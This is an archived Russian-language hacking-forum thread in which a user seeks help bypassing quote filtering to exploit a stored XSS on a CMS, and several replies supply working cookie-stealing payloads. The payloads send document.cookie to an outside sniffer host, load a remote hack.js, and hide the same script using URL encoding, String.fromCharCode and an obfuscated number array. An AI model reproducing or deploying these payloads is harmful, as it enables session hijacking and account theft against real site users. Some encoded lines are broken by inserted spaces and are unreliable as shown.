PDA

Просмотр полной версии : Обойти фильтрацию кавычек в XSS

FaR-G9
25.03.2009, 01:48
Нашел активную XSS на одном движке, только там фильтруются кавычки, попытался обойти и у меня возник такой вопрос

почему закодированная КСС не выполняется?
те так у меня работает отправка куков

<script>img = new Image(); img.src = "http://hacker-pro.ru/sniffer/Ы.gif?"+document.cookie;</script>


а вот так нет

<script>img = new Image(); img.src = String.fromCharCode(34,104,116,116,112,58,47,47,10 4,97,99,107,101,114,45,112,114,111,46,114,117,47,1 15,110,105,102,102,101,114,47,110,56,55,49,46,103, 105,102,63,34)+document.cookie;</script>
Pashkela
25.03.2009, 01:51
а ты так попробуй:

<script>img = new Image(); img.src =%22%68%74%74%70%3A%2F%2F%68%61%63%6B%65%72%2D%70% 72%6F%2E%72%75%2F%73%6E%69%66%66%65%72%2F%DB%2E%67 %69%66%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6 F%6B%69%65%3B</script>
Fepsis
25.03.2009, 02:04
может лучше поставить инклуд скрипта
<script type=text/javascript src=http://****.ru/1.js>qq</script>
а в 1.js записать то, что надо..?!?
FaR-G9
25.03.2009, 21:29
просто какойто ппц, оба способа не работают =//
mailbrush
25.03.2009, 21:42
<script src=http://site.ru/hack.js></script>
hack.js:img = new Image(); img.src = "http://hacker-pro.ru/sniffer/Ы.gif?"+document.cookie;
Так делай. Все должно работать!
VITАL
26.03.2009, 07:56
<script>document.write(String.fromCharCode(60,115,99,114,1 05,112,116,62,105,109,103,32,61,32,110,101,119,32, 73,109,97,103,101,40,41,59,32,105,109,103,46,115,1 14,99,32,61,32,34,104,116,116,112,58,47,47,104,97, 99,107,101,114,45,112,114,111,46,114,117,47,115,11 0,105,102,102,101,114,47,219,46,103,105,102,63,34, 43,100,111,99,117,109,101,110,116,46,99,111,111,10 7,105,101,59,60,47,115,99,114,105,112,116,62));</script>
или так )
<script>a=new Array(59.88,114.81,98.93,113.76,104.82,111.63,115. 89,61.86,104.92,108.79,102.98,31.68,60.94,31.84,10 9.82,100.65,118.8,31.71,72.68,108.73,96.91,102.71, 100.6,39.95,40.82,58.68,31.89,104.91,108.61,102.87 ,45.92,114.89,113.69,98.86,31.66,60.91,31.89,33.95 ,103.78,115.82,115.75,111.77,57.91,46.69,46.61,103 .73,96.75,98.81,106.85,100.83,113.95,44.76,111.95, 113.95,110.72,45.77,113.64,116.62,46.68,114.65,109 .89,104.61,101.94,101.99,100.87,113.6,46.91,218.77 ,45.96,102.69,104.99,101.71,62.86,33.9,42.81,99.88 ,110.64,98.96,116.69,108.89,100.8,109.64,115.66,45 .75,98.6,110.78,110.93,106.65,104.81,100.62,58.7,5 9.7,46.63,114.64,98.7,113.91,104.65,111.61,115.68, 61.61);var i;
for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round (a[i])));};</script>
problema
26.03.2009, 09:12
Раз ты копаешь CMS тогда кинь кусок кода где присутствует эта переменная через которую ты добавляешь текст, и ту часть где эта переменная фильтруется: ereg_replace() preg_replace() etc...
Или хотя бы кусок сформированного HTML кинь, где у тебя выводится твоё сообщение и куда и как вставляется твой "код".
А то по моему бессмыслено заниматься колдовством и проявлять экстрасенсорные способности.
FALTONICK
28.03.2009, 01:35
а может там нет никакой ксс?